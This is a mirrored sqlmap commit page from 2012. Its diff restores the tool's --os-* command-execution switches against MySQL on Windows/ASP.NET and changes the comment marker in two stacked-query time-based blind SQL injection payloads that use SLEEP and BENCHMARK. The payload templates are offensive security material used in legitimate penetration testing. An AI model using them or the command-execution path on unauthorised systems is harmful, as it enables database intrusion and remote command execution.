PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-07 21:21:33 +00:00
Code Issues Projects Releases Wiki Activity

Minor fixes to make --os-* switch work again against MySQL/Windows/ASP.NET (where stacked queries are supported)

Browse Source
This commit is contained in:
Bernardo Damele
2012-03-15 00:19:57 +00:00
parent 8cf5d260fd
commit 890bf708bc
2 changed files with 3 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/common.py
View File

@@ -959,7 +959,7 @@ def cleanQuery(query):
sqlStatementEsc = sqlStatement.replace("(", "\\(") sqlStatementEsc = sqlStatement.replace("(", "\\(")
queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I) queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I)
if queryMatch: if queryMatch and "sys_exec" not in query:
upperQuery = upperQuery.replace(queryMatch.group(1), sqlStatement.upper()) upperQuery = upperQuery.replace(queryMatch.group(1), sqlStatement.upper())
return upperQuery return upperQuery

4
xml/payloads.xml
View File

@@ -1834,7 +1834,7 @@ Formats:
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector> <vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
<request> <request>
<payload>; SELECT SLEEP([SLEEPTIME]);</payload> <payload>; SELECT SLEEP([SLEEPTIME]);</payload>
<comment>#</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>
@@ -1855,7 +1855,7 @@ Formats:
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector> <vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
<request> <request>
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload> <payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
<comment>#</comment> <comment>--</comment>
</request> </request>
<response> <response>
<time>[DELAYED]</time> <time>[DELAYED]</time>